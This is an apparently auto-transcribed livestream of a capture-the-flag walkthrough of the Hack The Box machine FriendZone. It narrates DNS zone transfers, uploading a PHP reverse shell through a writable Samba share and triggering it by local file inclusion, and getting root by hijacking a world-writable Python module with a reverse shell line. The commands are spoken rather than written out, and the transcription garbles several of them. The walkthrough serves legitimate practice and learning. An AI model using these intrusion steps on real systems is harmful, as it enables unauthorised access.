Why can't I figure out this one question? I guess we could rescan without the vuln script. I just thought, I mean, that would clear out the output a little bit. We're not finding no subdomains, nothing, dude. This is definitely a medium level box. Alright, map's done. We got no results. But I got rid of -s script vuln. Oh, that's right. I gotta change the IP on this. No, wait. Yeah, I gotta change the IP address on this. That's where I messed up. I don't understand how. Yeah. I remember these. We just did the wrong IP here. It's showing us this because this is what the results was earlier, because this used to be the IP address. But we reverted the machine, remember? Alright, here we go. That was fast. Let's look here. What do we got? Host key, domain, FriendZone escape software. Common name, friendzone.red. Organization name, code red. I don't understand. That's exactly what we did for the SSL cert. Friendzone.red? That's what I typed in, dude. Did I not type in friendzone.red earlier? Oh no, I typed in friendzoneportal.red. Oh. Okay. That's confusing. What's the name of the SAMA share that allows you anonymous read and write access? The name of that SAMA server was... We already found this out. It was general. Oh, maybe it's develop. Oh, it has write access? I didn't realize it had write access. But that's not where I got the creds. I got the creds from development, or from general, but I didn't know I had write access, so now that I know it has write access, we might be able to exploit that. But what's the admin password? Found this out. There are several subdomains in the FriendZone domain list available on a server. What is the name of the subdomain that returns a login form with the title login form for FriendZone? It's admin. Admin.friendzoneportal.red. What? Brother. There are several subdomains on the friendzone.red domain. Yeah, right. Maybe it's not portal? Maybe that's where I messed up. No, that's not right either. What's the name of the subdomain that returns a login form with the title? Is it just admin? Bro, what the heck? I hate this machine. That's the answer, bro. I don't know what to tell you. Like, I literally can navigate there, but when I type in admin, FriendZone portal, it don't work. How's that not the right answer, bro? That's the right answer. I can literally navigate there and see it. What's the name of the subdomain that returns a login form with the title login form for FriendZone? Maybe we haven't found it yet. You may be right. Maybe it's asking for something else. This is for the admin page. Yeah, this is different. Oh, I guess. Yeah, it's looking for a different. It's not admin. Okay. I thought this was the login form. Well, this is what I'm stuck on. I need a hint for this. DNS is listing on TCP. That means it's worth trying a zone transfer. We did do a zone transfer. We'll just try all the subdomains that we found. I hate this box. Well, I like how I can do a zone transfer, but I don't get the answer it's asking for. You know what I mean? Like, how do I get more subdomains out of a zone transfer than I already did? You know what I mean? That's what I don't understand. It doesn't make any sense to me. Is there a way to get more information out of a zone transfer? Because that's all I got. This is all I got here. I don't know how else to do it. I don't know how else to... 129.539 third IP address. How do you use DNS Recon? I just put in the domain. FriendZone portal.red. Maybe that's all I gotta do. How else do you do this? Name server. I don't know. What's up, Ezio? We're gonna stream. Thanks for stopping in. From Spain, nice. I don't know how to use this DNS Recon tool. Domain is this. The name server is definitely this. Range, I don't know what that means. I wish it would give me an example on how to use this. I don't want to save this to a file. Man, I don't know. This tool is so bad. Like, it doesn't give me an example on how to use this thing. I cries. What do you mean name server? I gave you an IP address for the name server. Like when I do -ns. Oh, it's just -in. -in. Try that maybe. This looks like it's working now. So DK better work on the stream. Thanks for stopping in. I'm trying to do some DNS enumeration, trying to find subdomains, but it's not working. I'm not getting nothing. I did a zone. It told me to do a zone transfer, but none of these answers are in it. So I got to pull up the write up here. I'm missing something. There's a way to do a zone transfer that I don't know about. Because that's the only way I know how to do a zone transfer, and apparently that's not good enough. What? That's not what I got when I did the zone transfer. I did the zone transfer the same exact way. Or maybe I didn't. He got administrator 1? That's not what I got. Well, this is how I did my zone transfer. Tell me what I did differently than him. Other than the fact that he did it on friendzone.red. I did mine on friendzone portal. See? Oh my god, that's crazy. Why there's so many? Friendzone.red. Friendzone portal. Oh my god, there it is. That's all I need. I just had to do on friendzone red. But where did we get friendzone.red? Where did we get that information? I guess right here, friendzone.red. Dang, man. That's frustrating. This whole time I thought it was friendzone.portal. I'm scanning the wrong thing. Well, see, friendzone portal works. That's a thing. See, friendzone portal literally works. They gave us a rabbit hole in this box. They're not supposed to do that. They're not supposed to. When they submit boxes, they're not supposed to throw in unnecessary rabbit holes. I feel like there's an unnecessary rabbit hole. It's one of the requirements for hack-to-box machines when you submit them. Don't make unnecessary rabbit holes. And that is definitely an unnecessary rabbit hole. I spent so much time on that. I got so many results from friendzone.portal.red that I didn't even consider that friendzone.red was the thing. I thought it was. It is what it is. So we can do administrator1.friendzone.red. What just happened, bro? This is not where I want to be. It don't work. Oh, I know why it's not working, because I need to add my Etsy host. That's what it is. There we go. Gosh, finally we made it here. Okay, we got creds for this. Yeah, I really don't like how they give me an unnecessary rabbit hole, and they know it too because they're like, "Oh, it's on a different page." You literally set up a whole website with multiple subdomains and everything just to trick me, just to get me off the track. I don't like that. I don't like that at all. Like I said, they're not. One of the requirements for Hack-the-Box is they're not supposed to be unnecessary rabbit holes, and that's definitely an unnecessary rabbit hole, in my opinion. So I'm salty about this. I wasted so much time on that. See you later, Kat. Thanks for stopping. Thanks for watching. Thanks for hanging out. All right, let's do password and admin. Login done. Visit dashboard.php. Smart photo script for FriendZone Corp. No, we are dealing with a beginner PHP developers and the application is not tested yet. Please enter default name is view page source. Smart photo script. Maybe we can do a PHP reverse shell here. Image name parameter is missed. Default is image ID equals. So what do I do? Just like question mark. We have to figure out how to exploit this. All right. What if I just do question mark and then random stuff? Does it give me the same information? No. So that tells me I did it right. So this is definitely right. Image ID equals this, and page name equals timestamp. Page name equals test, maybe? Page name equals timestamp. So it says final access timestamp. So it gives me an image, and then it gives me a timestamp. View page source. Page name equals, let's try this. Page name equals nothing. I think a vulnerability has to be in this page name. page name equals see, I just loaded up the page again. And it's gonna go on forever because it's okay. So I can view other pages from this. But I just gotta find the page. The other subdomains was uploads. Oh, that's really good one to check out. Gotta add it to my Etsy host. I always forget to do that. Somehow I'm still not, my SEOs isn't working or something? I don't get it. Oh, upload. I'm going to do uploads. Somehow still not doing it. What is up with that, dude? Uploads FriendZone.red. There's also HR too. HR. Administrator 1, friendzone.red, HR, friendzone.red, uploads, friendzone.red. Well, it'd be nice if I could go to, uploads, friendzone.red. But every time I go to uploads, friendzone.red, it takes me to this thing that doesn't. There we go. Let's try HR. What if we did https:// oh, https is oh, nothing. There we go. We can upload stuff. Oh, look at that. Click the image to upload only images. Let's upload earth.jpg. See if that just lets us do stuff. Upload successfully. Is that a timestamp? Let's take a timestamp. I thought. Default is image ID. How does that not work all of a sudden? Push. Oh, that's why. Because I need to do it like this. See if ERC works. ERC did not work. Page name. Nothing. This upload functionality has to be the vulnerability here. Yeah, the timestamp goes away once you get rid of the time. So if you do page name timestamp, the timestamp comes back. So I'm assuming that if I ask for a specific page name, I could just get information out of here. But I don't know how to figure out like what, you know, pages are on. I don't know where this ERC JPEG went. What if we just do a show.php, see if that just lets me upload it? It said upload successfully. I uploaded an actual PHP script. So that's good. We just gotta figure out where that is being uploaded to. Upload successfully. That's gotta be upload a JPEG. We can do what if we do ERC.jpg? What if we just do slash this? Nope, I gotta figure out where this is at. Yes, please resubmit that. I don't. Why would it? This timestamp's gotta be used for something. You know what I mean? I just gotta, if I can figure out how to just view that. if I can figure out just how to view that image. Oh, now all of a sudden that's not working. Alright, well, that's cool. Gotta go back to Etsy hosts. How does it keep giving me that? FriendZone.red works. No, now it don't work. It was working 2 seconds ago. Now it's not. FriendZone.red, you got the IP address there. I don't see why that's not working. http:// Alright, that works. Now if I just do a slash, paste my timestamp in there, it takes me back here. Why? Why does it do that? Oh my god, I hate this box, dude. This is probably my least favorite one we've ever done. It doesn't make any sense for that not to work. Alright, now that's working now. Okay. Perfect. I don't know why that wasn't working earlier, but now it is. Now, page name equals timestamp. Page name. Oh, it wants a timestamp. Page name equals this is my timestamp that I just got from uploading the image. You'd think page name equals timestamp. Well, here's the timestamp. Nothing. Nothing. All I need to do is, as soon as I see the image that I uploaded on my screen, then I know that I have an exploit here. Yeah, I've already tried the image name. Final access timestamp is this. Well, I know. Image ID equals irc.jpg. So the image ID final access, is it giving the same timestamp every time, or is it different? It's different every time. Page name. Yeah, I don't know how to. I don't know. I gotta figure out how to. Page name equals uploads. What's up, Yorlin? Welcome back to the stream. How you doing today? Yeah, I don't know, man. Let's go back to guided mode. So we found this one, administrator 1 dot. I forget the name of it. So this is the right answer here. The dashboard PHP seems to include another page that provides a timestamp. That page can also be visited directly. What is the relative path of the web server of that page? I'm not sure what it's asking here. You can run a tool like GoBuster or just guess around the server until you find it. Another page that provides a time. The dashboard PHP seems to be including another page. I guess we gotta Furrox bust this. Let's fuzz this. See if we get anything here. Oh, it's slash images. No, that's not what I wanted. No, go back. I don't know how that ended up on this tab anyways. So slash images. Oh, there we go. But how do I up? What's b.jpg? Why does this picture just seem so out of pocket? Like, what is going on here? Got it. This guy, this box developer likes to tease you and trick you and throw rabbit holes at you. They're playing my feelings. All right, let's is it slash images? Is that? It seems to be including another page that provides a timestamp. That page is also can be visited directly. That's probably not it. You can run a tool like GoBuster or guess around the server until you find it. We are close to the user flag. Man, this user flag's been a pain, man. That provides a timestamp. You know what we need to do? I just need to view the page source, maybe. Where's the dashboard at? Let's go back to the dashboard. Includes another page that includes a time. Is it just? Smart photo script. Image source equals. It's not slash images. That's kind of weird to me. Yeah, images slash. Did I try slash images? Yeah, I did. Huh. What is the relative path on the web server to that page? I don't know what page it is. GoBuster or guess around a server until you find it. I don't know, man. All I found was slashed images. Bro, this is a medium level box. This is not even. This is a medium, bro. Did you try upload PHP? That was a different. There's uploads.friendzone. See?
Access granted.
Chakma Nidu? Hope I'm saying that right. If I'm not, feel free to correct me in the chat. Thanks for subscribing on the YouTube channel. Appreciate you. Bro, I don't know. I don't want to write up yet. What did the question say again? The dashboard PHP page seems to be including another page that provides a timestamp. That page can also be visited directly. What is the relative path of that web server on that page? So it's saying that the dashboard page, which is this, includes another thing that includes a timestamp. Is it just timestamp? I don't understand. Page name equals timestamp. Can I just go to /timestamp? Well, it is running PHP. That's true. There's so many pages that it's like I don't even know what it's asking for. I'm gonna go to the write up. I don't know what it's asking for here. Ready to execute the friend zone? We did not get this page when we went to friendzone.red. He's got a whole different page here. Exploiting LFI. Alright, we... This write-up sucks. He just like went straight to a shell. Like he didn't explain how he got it at all. The official write-ups are always the worst ones. I think a lot of these easy boxes used to be mediums. This one might have been a medium, but it's... I don't think it was. I think it was just missed rated. See, I never got that page. It is timestamped PHP, I think. It is timestamp.php. What is the full path of the friend zone to the directory that is shared by Samba as a development share? So we can write to the development share, so if we can figure out how to navigate to that, then we can exploit it. What is the full path in the friend zone to the directory that is shared by the same? This can be revealed by doing in-mount. This is a hard box, man. It wants the full path to the development share. / Etsy development. Ah, okay, that's nice to know. What? Maybe that. Oh, I gotta change the slashes to go the other way. That's that's right. Okay. What user is a web server running as? Okay, we just need to get a show at this point. Which I think we got it. All we have to do is we have right access to development. Now we can just do. What's up, pre-sequel? Welcome to the stream. Thanks for stopping in. Glad to see you in the chat. How you doing today? Okay, so we can upload stuff. Let's log into that Samba share. That ain't gonna work because that's not the right IP address. How do I upload on an SMB? Huh. That's a good question to ask ChatGPT. How do I upload files on SMB client? Yes, I know, I understand. Okay, it's put path to local path remote desktop. Okay, that's what I did wrong. It's put, not upload. So let's just do the same command again, but this time we will do put. Set object path not found. Opening remote file. Yeah, I gotta put it in this. Let's try that. Huh? Yeah, that's right. That's the right path. I don't understand. I put this file in. Okay. Maybe I got it backwards. Do I got it backwards? Why doesn't this work? That doesn't make any sense to me. ChatGPT says just yeah, I mean I have it right according to ChatGPT, but I don't understand why it doesn't work. You're saying if I do alright, let's see, change directory. Hack the box. Oh, hack the box slash FriendZone. We will copy here. Max, welcome to the stream. Thanks for hopping in. Glad to see you here. Isn't looking at the write-up cheating? I mean, if you can call it that if you want. However, if you never look at a write-up, then you never learn. Like I've learned so much from write-ups. there's no shame in using write-ups, and the majority of people in this field will agree at that. If you get stuck looking at a write-up, there's no shame in that, because that's where you learn. And then furthermore, yeah, I try to keep things, because these streams are like 4 hours long, and if I didn't look at write-ups, then there would be streams where I just don't finish the box, and I want to at least finish the box, and sometimes I have to look at the write-up to speed up the process. Also, for me, I would not spend all day on a single box. Yeah, exactly. Yeah, exactly. I agree with that. My rule is, generally speaking, give it an hour and a half, and then I look at it right up. That's my rule. Hour and a half, 2 hours. You spend an hour and a half, 2 hours. It's like, okay, you tried everything you could. Let's check the write-up. If you go straight to the write-up, like you don't try anything, that's bad. I would not do that. But you know, in this case, I've been streaming for over 2 hours now, so it's like, okay, I'm stuck. I'm actually stuck. This is how I should approach boxes as a beginner. Yeah, that's my recommendation. That's how I always do it. Spend an hour and a half to 2 hours on a box, and if you're not making any progress, then start looking at some write-ups. I always like to, so hack the box is guided mode. I always like to do guided mode first, because this kind of gives you, this doesn't give you the answers, but it helps you, pushes you in the right direction in the answer, gives you some nudges. And then if this still doesn't work for you, look at the write-up. And that's my advice. And I've learned so much from guided mode, and I've also learned a lot from write-ups. So, and then sometimes you pwn box without looking at the write-ups, and sometimes you don't, you know what I mean? It's just, you don't know what you don't know. Anyways, we're trying to upload this. So we should be able to put ert.jpg here. Is that gonna work? Invalid opening remote file. I don't understand why I can't write to this. I'm supposed to be able to write to this, but I can't. Let's look at the commands that they use in the write-up. I don't know. Yeah, cross-site scripting. This write-up is confusing as heck. The official write-up was, well, it seemed more straightforward to me. Put PHP reverse shell. Why can't I do that, dude? Why can't I just put a file in a, like, I'm doing the same command. He's on the development share. Okay, that's what I'm on. Put PHP reverse shell.php. So why don't I get that luxury? Why don't I get that ability when I do the same, the literal same exact command? All he did was just put the file like that. Oh, that worked. You don't have to, okay. I thought you had to add this, but we tried that earlier, it still didn't work. Anyways, so if we do ls, We should have irk.jpg. Okay. Now, if we go back over to here, is it irk.jpg? Yeah, but where does this get kicked in at though? I don't understand how you would trigger the reverse shell. Oh, okay, that's right. We gotta do Etsy development. Where's my... Somewhere I got it. So page name equals /Etsy /development / that should load the image. Well, I gotta spell irked right. I think it just runs it. So let's just do a pentest monkey. Change directory. Back the box. What was the name of this machine? FriendZone. My brain's fried, guys. We're going to use a PHP pentest monkey reverse shell here. That's, I copied something. I thought I copied it in my clipboard. Copy. We'll put my IP in port. My listening port's going to be 443, so we'll do that. And then we will do netcat-livp 443. We'll have our listener set up. And then we will do put exploit LLIT exploit.php. That should work. Alright, now if we navigate to that should work. Maybe. No. Exactly what the write-up said to do. Etsy development. Oh, maybe the capitalization matters here. Maybe that's where I messed up. Page name equals /Etsy /development development /exploit.php. Why does that not work for me? Niboon, welcome to the stream. Thanks for happening. Glad to see you here. How can I ever understand this? A lot of time and a lot of practice. Maybe it needs... Is exploit.php here? Exploit.php is here. How does he get that to work but not me? That doesn't seem fair. He did PHP reverse shell. Maybe it isn't. Maybe he didn't give it a extension. PHP reverse shell. What if we just... Go back to here. We will put... He didn't give it an extension. Maybe that's what it needs. Maybe we just need to get rid of the file extension. It's the only difference he did. I don't understand why it won't work for me. I'm doing the exact same thing. Oh, he put PHP reverse shell.php, then he triggered it without the extension. So let's try this then. So he, okay. So he triggered it by not giving an extension. Let's see if that works. That didn't work either. That is very unfortunate. Alright guys, I'll be right back. I gotta go take a quick break.
Access granted.
Mixed knowledge. Thanks for subscribing over on the YouTube channel. I appreciate you. Alright, I have returned. And yeah, we're stuck. I don't understand. I'm following exactly the exact steps that the official write-up's using here, but I don't know. I'm not doing a single thing that's different here. Not a single thing. He's also using the pentest monkey reverse shell. So he's using the same exact thing as me. Or she. I don't know who wrote this up, but that time I literally copy and pasted his command. But I don't get it. I don't get a reverse shell like the write-up says. Connection refused. So that seems interesting. The fact that I got this little error. So did I get a reverse shell that time? Oh, it said connection refused because I didn't have a listener. It worked. It triggered. Let's refresh that again. That should work. Where's my... Oh. I thought... This worked. I just gotta actually have a listener to catch it. Okay, there we go. I don't know why that didn't work the first 5 times I tried it, but, you know, it is what it is. I didn't do anything differently. Walk with hackers. We're going to stream. Thanks for stopping in. Glad to see you here. What's up, A7 Mad? I mean, every root flag is different on Hackbox. I don't know what that root flag's for, but that's definitely not the root flag. every time you spawn the machine, it's a different root flag. So even if he did post his root flag that he got, it would always be a different flag. Because it randomly generates a new one every time. That's why when I stream, like, I don't block out the root flag, because it's going to be different for everybody. Anyways, we got initial access here after a long time. We got to stabilize our shell now. Who am I? What user am I? I'm data. Do we got a user flag here? MySQL. Data.conf. Oh, look at that. MySQL for user friend. So we can... That's why it's called FriendZone. We did a zone transfer, and then the user is friend. You see what I did there? So we got creds. We just need to log into the MySQL database and see what's going on here. What's up? It's Wits on the stream. Thanks for stopping in. Glad to see you here. Yeah, I do have the OSCP. How much do you use the information from you learn from things like CH and EJPT? CH not too much, EJPT a lot. Matter of fact, I was in my EJPT notes earlier this stream, so I use my EJPT knowledge every day. CH not so much. CH is way overrated. I'm saying OSCP versus those. Well, I would say everything that I learned in EJPT went into the OSCP. CH went into the OSCP slightly, honestly, not much, because CH is a multiple choice certification, whereas EJPT is hands-on. So everything I learned in EJPT went into the OSCP. It was a great cert to get before OSCP, if that makes sense. And I used stuff I learned in OSCP as well, obviously. So it just kind of built on each other. CH equals poop. Yeah, it's a bit overrated. What certificates do I have? It's in the description. There's 13 of them in there. Check the stream description. I put it in there so people know. Or you can check my LinkedIn as well, or my website, kyserclark.com. My certs are kind of listed everywhere, honestly. Alright, so let's do MySQL. Oh man, I forgot how to log into MySQL. I always forget the syntax. It's like MySQL something and something else. So my EJPT notes, once again, back to those EJPT. Go SQL here. I just need to get this. It's just MySQL -u. Okay, easy enough. MySQL -u friend. Huh? Oh, I typed in MSSQL. MySQL -u friend. Huh? Cat MySQL database. What do you mean I can't? Is MySQL running on this thing? MySQL's not found. For development process, this is the MySQL creds for user friend. Switch user friend. That worked. Okay, we don't need to go into MySQL. We got them. Alright, so let's go change directory home. There should be a user flag here. Yep. We got the user flag there. This user flag was far, dude. This user flag took too much. I'm gonna say it's a bit hard. I ain't gonna lie. That was a bit tricky. Alright, we gotta figure out how to elevate our privileges now. Sudo -l. Hopefully the privilege escalation is easy. That's not the password, that's the flag. Grab his password here. Grab the password for friend. May not run sudo on FriendZone. Alrighty. What's in the home directory? Just the user.txt. We're going to start a Python server with my tools, and we're going to transfer linps over here. So we'll do a wget http:// this is my IP address, linps.sh chmod +x linps.sh make linps executable, and we will clear this out and we will run linps.sh. Dot. There we go. It's linps time. Look at him. Look at him. Just like a cutie is. He's, you know, just a pea. Like a pea with a ninja with a penguin on his head. Let's see what we got. Yeah. Let's try to escalate our privileges without any guidance here. We had to use a walkthrough to get into the box, but this time we might be able to elevate our privileges without any help. I'm hoping anyways. sudo versions here. See if there's an exploit for that. I'm gonna close out all. Well, I probably shouldn't have closed out those right so well. Hopefully I didn't lose my shell. This is a bash script? Let's friend at we should be able to SSH onto the box with this password that we got. Perfect. Alright, so now this is actually the most stable shell we can get. Let's do a let's just try this bash script here. You think this will work? Sudo password for friend. The sudo password for friend. Oh, but he can't run sudo, so I guess it ain't gonna work. You can't run sudo as root. Do you want to proceed anyways? Yes. Yeah, that didn't work. Yeah, PSPY comes in handy a lot. We're gonna log in again on another tab. This is what I like about SSH access. I can always just get back in. My shell messes up, or I can have multiple tabs. Change directory tools. Change directory tools. Start my Python server. PSPY64. So let's do change directory /temp, and then we will wget http://10.16.11/PSPY64. And it's chmod plus X PSPY64 and access granted. A Marimobun, am I saying that correctly? Thanks for following over on Twitch. Appreciate you. Let's see if we can get anything on. Oh, we got some stuff. No, wait. We'll let this run just a little longer. This is what's just running now. Let's see. He's going to listen for events. If anything pops up here. Oh, look, there's a cron job. PSPY is such a good tool, dude. Well, the vulnerabilities right here. I'm thinking. Because that's a cron job. Server admin / reporter.py. So this is get executed. Either been Python ops server. So it's running this Python script. It's running this Python script. Do I have write access to this? It's unwritable. I can't write to this file. If I could, that would be pretty cool. But I can't. To address admin. Import operating system to address admin1 at friendzone.com. From address. So sending email. Trying to send email to address. Mail send to from. I need to edit the script later. Sam, Python developer. OS system command. Well, I can't write to it though. It's owned by root, but I can read it, but I can't write. So this is me. When I did nano. What is the -F? What happens if I run this? Expected single character argument. Required argument missing. Permission denied. What was in the script? Yeah, it's... I'm not entirely sure what's going on with the script, to be honest with you. Like, I mean, look. Did you already check the permissions? Yeah, it doesn't let me write to it. But this is what's getting executed. Trying to send mail. It's just trying to send mail. SSL port 465. Maybe command. Oh, I gotta send command equals. This is the command from admin. Import OS. Yeah, but it's commented out though. So is command. So I don't know what to do with that. If I could edit this is obvious, you know, but I can't edit it. What's up, Mr. Error? Welcome to the stream. Thanks for stopping in. Glad to see you here. Oh man, let's go to the guided mode here. We're running out of time. What is user friend's password? We figured that out. It's running as friend. Oh, we can answer this question here. It's running as friend. Oh no, it's running as dub. Data, that's right. And then the password for friend is that. What is the full path of the script that root is running every few minutes on a cron? Well, we know that to be this. We found that out. Oh, I just don't know how to exploit this. We figured out what is the full path to the file related to your reporter.py that is also world writable. There's another one that's world writable. It's related to that. Op server. I don't know. A file that's world writable that's related to this. Well, maybe there's more to there's more to this command over here, I think. If I keep scrolling over to the right, maybe. Dash pass pap app. User is you. Password is pap app. I don't know what that means, dude. What is the full path to the file related? This file is also imported by reporter.py. An enumeration tool like Limpy's will identify this if you are stuck. It's imported? I don't see anything getting imported. Oh, is it just OS? Import OS? It says Limpy's will help you, but let's see here. Is it just OS? I need the full path though. What's the full path to that? I wish it wasn't such a pain to scroll up and down with this scrolly bar. SMB status only works as root. The path below is writable to all. So the SAM is writable to all. We already knew that. For the SAM server. There's gotta be something that's related to that script, but I don't. See, I was doing so good. Alright. I just want to scroll down and then it like skips around on me. Makes it hard to go through this. Yeah, I don't know, man. What is the full path to the file related to reporter.py that's also world writable? The file is also imported by reporter.py. An enumeration tool like LinPs will identify this if you are stuck. I'm not seeing it. It's imported. OS is imported, but it's commented out though, so I don't see how that would trigger it. But I guess if it import, yeah, that makes sense. Okay. I see SMB's world writable, but we already knew that. That's how we got in the box initially. File called OS. I don't think it's gonna work. But I will do this. I asked ChatGPT this question. In Python, you can import OS for to run commands. Where is the OS module located in Linux? Full path. Run the following Python code to get the full path. Alright, well, let's... There we go. So this has got to be it then. That's not it. What is the full path to the file related to that's also world writable? The file is also imported by reporter.py, an enumeration tool like Limpy to identify this if you're stuck. Yeah, I said world writable, yeah. I just don't see... There's too much Limpy's output. There's gotta be a way to... Let's ask ChatGPT this question. How can I list all world writable files in Linux? This is a huge list. Okay. I don't think it's going to be app armor. Use a lib This is world writable. User lib python 2.7.os.py. Oh. Well, it says 3.6. So this is the same thing, except this is a different version, so maybe that's the answer. What was it 2.7? It changes to a 2.7. That was right. Yeah. Wonder why we didn't get that when we ran it in Python. What's up, Ralph the Law? Welcome to the stream. Thanks for stopping in. Glad to see you here. How you doing today? So I can just write to this? Can I just write like a let's just write a Python reverse shell. So what is Hack-a-Box? This is Hack-a-Box here. It's a place where there's intentionally vulnerable machines that you can practice your hacking skills on. We had this problem before where we needed to write a Python script that had a reverse shell, but for some reason it took us a long time, and I can't remember what we did to solve that problem. What did we do for that problem? Sounds difficult. I'm here struggling with connecting values from ESP32 to Raspberry Pi using MQTT. Ralph the Wall, thanks for following over on Twitch. I appreciate you. What Python script did we use? I should have put this in my notes from before. Oh no, we tried one of these. We just kept trying a bunch of these, remember? I do remember this. We just copy and pasted all these until they worked. I don't know if one worked though. I'm just writing this in my notes, so we just got to do my IP address here, 10.10.16.11, and the R port was 443. Also, what's the next question? Guided mode. Submit the flag. Okay, that's it. We gave you enough hints. Well, the answer is kind of obvious. Well, yeah, it is. We just gotta modify the script. What's my notepad? What if we did? Delete this whole thing. This is a lot, dude. Oh my gosh. If I would have known this, I would have just added to it instead of deleting the whole thing. But it's too late now. Gosh. This is a huge file. How big is this? You know what? Let's not save this. Let's just try that again. And then right here on the top, we're going to paste this. And this should just give us a I'm hoping that just works. Or what we could do is we could do how long it gets ran every few minutes. Let's see, the last time we didn't get ran again. How long does it get ran? How long does it take? It looks like it takes. Let's look here. 22:50:01. It gets ran every 2 minutes. So we gotta wait 2 minutes for this to run. And it hasn't ran since we modified the file, so we know it's impossible to get a reverse shell. But if it runs and we don't get a reverse shell, then we know that, okay, it just ran. Did we get a reverse shell? We did not. Okay, so we know that that didn't work. Actually, matter of fact, let's do let's just remove the whole file. Well, let's make a backup of it. No, just, what do you mean? This is like Easter egg hunts for nerds. Love it. Yeah, it's basically, yeah, that's exactly what it is. I don't know. Well, let's just try a different. Let's try the next one down the line. Next one down the list. I don't know why I'm all the way down here. What the heck? Where did my Python stuff go? I have to wait 2 minutes every time. In the meantime, let's just get an entire notebook filled with payloads ready to go. I'm just copying all these in my notebook, and then I'm going to put my IP address on these. Did it not run? I'm going to do this in Word actually. Alright, just ran again. Did we get a listener? We did not. Alright, so this time I'm just going to paste all of them. One of these is going to work. So we got all these in one file, so one of these will work, I'm assuming. I mean, I remember last time that's what we did. We just did trial and error, but instead of doing one at a time, waiting 2 minutes every time, it should just go down the list. Like if it didn't work, boom, you know, go to the next one, and then eventually one will work, hopefully. So in 2 minutes, we don't catch a reverse shell. I'm actually going to read the walkthrough in the meantime, because if that don't work, then I'm out of ideas. Cron enumeration. Let's overwrite the cron tab with a malicious one. Create a file os.py that with contents and upload it to the share. So what are they doing here? How do you overwrite the cron tab? And the cron tab will send us a... Is that OSPI file still there? What you doing, buddy? We got... Cat needs a pet. 1 sec, guys. Yeah, I don't think this is working the way I thought it was. I don't understand how you can just overwrite the cron tab, though. If we write code to os.py, we can hijack execution. That makes sense. This is known as module hijacking. Let's overwrite the cron tab with a malicious one. The cron tab will send us a reverse shell. Let's overwrite cron tab. I'm so confused on how that works. These official write-ups are so bad. That doesn't make any sense to me at all. So he just added this line at the end of it. I had the right idea. I don't know why mine's not working. I'm gonna have to put this in my notes because this works and the other ones I was using from the other guy didn't work. Is there a way to get to the bottom of this without like taking an hour? We can just use append. Why is my brain farting here? Yeah, I'm just gonna have to append the file. How does it go? It's like print. Why can't I paste? Echo, that's what it is. I don't know why. My brain is so melted right now. Echo this. And it's just, yep. Not create file. No. There we go. That's what I want. So do that same command and then append it to. Oh man, I forget the full path of that file. Ten 10 16 11 443. Oh, I did get a shell. I accidentally closed it. My way worked. I closed my own shell? I guess I just wouldn't wait long enough, but my way worked. Look, I had a shell, so somehow I closed it? How did I do that? I think it's because I changed the file. But look, I did get a shell the way I tried. I just didn't wait long enough, I guess. I don't know, that's weird. One of these worked over here. I don't know which one, but one of these ones worked. I don't know which one though. We caught a shell, but I don't know why it ended. I must have accidentally. I did something that messed it up. I guess these official write-ups are meant to be a bit cryptic, so you still have to figure something out on your own. Maybe. I just think they're just badly written. I like reading other people's write-ups, like the community's write-ups. What's up, Raphael? Mods, welcome to the stream. Thanks for stopping in. Glad to see you here. If I tail this, I should have what I want. System. Does this indent? Does this need to be indented differently? How do you get your tabs to have names? You just like if you do a new tab, you right click, rename session, new name, and then hit OK. And then you can also give it colors too if you want. You can also, you know, if we want it purple, you know, we can also just build in a Kali Linux like that. It's the default. Finally. Who am I? Root ID root cat /root/root.txt, and there we go. Dang, that was a long machine, dude. This flag rating, I'm gonna have to get this one not too easy. This is I would say this is a medium machine, dude. In my opinion, this should have been rated a medium. I don't think this is an easy one at all. All right, guys. Well, thanks for watching. Thanks for hanging out. That's gonna wrap it up. Yeah, this one was a doozy today. Normally, yeah, I mean, we were on a streak where it took me like, you know, I'd do 3 in a day, 2 in a day. Hey, someone just followed. Who did that? HLFFGB. Thanks for following over on Twitch. I appreciate you. If you're watching, if you got this far in the stream or in the video, if you're watching this on the past broadcast, follow the channel, subscribe to the channel. If you haven't already, check out my podcast. It's called The Hacker's Cache. It's on all the podcast applications as well as YouTube. So make sure you check out my podcast if you're interested in growing and learning more about hacking and cybersecurity. I stream on every Sunday at noon Eastern time. That's 7 p.m. Pacific time. Sorry, 7 a.m. Pacific time. No, wait, not 9. Let me just say that again. Noon Eastern time, 9 a.m. Pacific time. And then on Thursday, I stream at 7 p.m. Eastern time, which is 4 p.m. Pacific time. So Thursday, Sunday, live streams. And hopefully I see you on the next live stream. Once again, thanks for watching. Thanks for hanging out. Who just followed? Ellie Hoog. Well, hopefully I'm saying that right. If I'm saying your name wrong, I'm sorry. But thanks for the follow over on Twitch. Appreciate you.
Access granted.
Casey. Now a subscriber on YouTube. Thank you for subscribing, Casey. Appreciate you. Hopefully, check out my videos on YouTube. I got tons of videos, guys, and I got way more on the way. So stay tuned for more content. Appreciate you hanging out. Nazri, thanks for stopping in the chat. Thanks for watching. You guys are awesome, and I will see you in the next stream or the next YouTube video, whatever you decide to consume next from me. Tons of content out there, and if you haven't joined already, the Discord, feel free to join the Discord. I have a Discord server running now. It's growing slowly but surely, and the links are in the description over on the YouTube channel. So, alright guys, see you around. Once again, thanks for watching. Thanks for hanging out. You guys are awesome. Peace out. Take care. Have a good one. Kyser out.